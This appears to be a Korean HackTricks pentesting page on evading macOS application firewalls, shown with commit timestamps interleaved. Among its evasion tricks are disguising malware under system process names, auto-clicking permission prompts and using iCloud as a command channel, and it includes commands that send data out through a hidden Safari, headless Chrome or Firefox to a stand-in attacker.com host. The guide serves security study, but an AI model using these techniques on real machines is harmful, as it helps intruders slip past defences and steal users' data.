2024-05-05 22:46:17 +00:00
# macOS 방화벽 우회
2023-06-08 16:46:11 +00:00
< details >
2024-05-05 22:46:17 +00:00
< summary >< strong > htARTE (HackTricks AWS Red Team Expert)</ strong > 를 통해 **제로부터 영웅이 되는 AWS 해킹을 배우세요** !</ summary >
2023-06-08 16:46:11 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2023-12-30 20:49:49 +00:00
2024-05-05 22:46:17 +00:00
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제** ](https://github.com/sponsors/carlospolop )를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그** ](https://peass.creator-spring.com )를 구매하세요
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요, 당사의 독점 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션
* **💬 [**Discord 그룹** ](https://discord.gg/hRep4RUj7f )이나 [**텔레그램 그룹** ](https://t.me/peass )에 **가입**하거나 **트위터** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )을 **팔로우**하세요.
* **해킹 요령을 공유하려면 PR을 제출하여** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 및 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 저장소에 기여하세요.
2023-06-08 16:46:11 +00:00
< / details >
2024-05-05 22:46:17 +00:00
## 발견된 기술
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
일부 macOS 방화벽 앱에서 작동하는 다음 기술들을 발견했습니다.
2023-06-08 16:46:11 +00:00
2024-02-10 21:30:13 +00:00
### 화이트리스트 이름 남용
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
* 예를 들어 악성 코드를 ** `launchd` **와 같은 잘 알려진 macOS 프로세스 이름으로 부르기
2023-06-08 16:46:11 +00:00
2024-02-10 21:30:13 +00:00
### 합성 클릭
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
* 방화벽이 사용자에게 허가를 요청하면 악성 코드가 **허용을 클릭**하도록 함
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
### **Apple 서명된 이진 파일 사용**
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
* **`curl`**과 같은 것뿐만 아니라 ** `whois` **와 같은 다른 이진 파일 사용
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
### 잘 알려진 애플 도메인
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
방화벽이 ** `apple.com` ** 또는 ** `icloud.com` **과 같은 잘 알려진 애플 도메인으로의 연결을 허용할 수 있습니다. 그리고 iCloud를 C2로 사용할 수 있습니다.
2023-06-08 16:46:11 +00:00
2024-02-10 21:30:13 +00:00
### 일반적인 우회
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
방화벽 우회를 시도하는 몇 가지 아이디어
2023-06-08 16:46:11 +00:00
2024-02-10 21:30:13 +00:00
### 허용된 트래픽 확인
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
허용된 트래픽을 확인하면 잠재적으로 화이트리스트에 등록된 도메인이나 해당 도메인에 액세스할 수 있는 애플리케이션을 식별하는 데 도움이 됩니다.
2023-06-08 16:46:11 +00:00
```bash
lsof -i TCP -sTCP:ESTABLISHED
```
2024-02-10 21:30:13 +00:00
### DNS 남용
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
DNS 해결은 아마도 DNS 서버에 연락할 수 있도록 허용될 것으로 예상되는 ** `mdnsreponder` ** 서명된 애플리케이션을 통해 수행됩니다.
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
< figure > < img src = "../../.gitbook/assets/image (468).png" alt = "https://www.youtube.com/watch?v=UlT5KFTMn2k" > < figcaption > < / figcaption > < / figure >
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
### 브라우저 앱을 통해
2023-06-08 16:46:11 +00:00
* **oascript**
```applescript
tell application "Safari"
2024-02-10 21:30:13 +00:00
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
2023-06-08 16:46:11 +00:00
end tell
```
2024-02-10 21:30:13 +00:00
* 구글 크롬
2023-06-08 16:46:11 +00:00
{% code overflow="wrap" %}
```bash
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
```
{% endcode %}
2024-02-10 21:30:13 +00:00
* 파이어폭스
2023-06-08 16:46:11 +00:00
```bash
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
```
* Safari
```bash
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
```
2024-05-05 22:46:17 +00:00
### 프로세스 인젝션을 통해
2023-06-08 16:46:11 +00:00
2024-05-05 22:46:17 +00:00
만약 **프로세스에 코드를 인젝션**할 수 있다면, 어떤 서버에 연결할 수 있는 권한이 있는 프로세스로 방화벽 보호를 우회할 수 있습니다:
2023-06-08 16:46:11 +00:00
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse ](macos-proces-abuse/ )
{% endcontent-ref %}
2024-02-10 21:30:13 +00:00
## 참고 자료
2023-06-08 16:46:11 +00:00
* [https://www.youtube.com/watch?v=UlT5KFTMn2k ](https://www.youtube.com/watch?v=UlT5KFTMn2k )
< details >
2024-05-05 22:46:17 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 AWS 해킹을 배우세요< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-06-08 16:46:11 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2023-12-30 20:49:49 +00:00
2024-05-05 22:46:17 +00:00
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제** ](https://github.com/sponsors/carlospolop )를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그** ](https://peass.creator-spring.com )를 구매하세요
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요, 당사의 독점 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션
* **💬 [**디스코드 그룹** ](https://discord.gg/hRep4RUj7f )에 가입하거나 [**텔레그램 그룹** ](https://t.me/peass )에 가입하거나** 트위터** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**를 팔로우하세요.**
* **HackTricks** 및 **HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유하세요.**
2023-06-08 16:46:11 +00:00
< / details >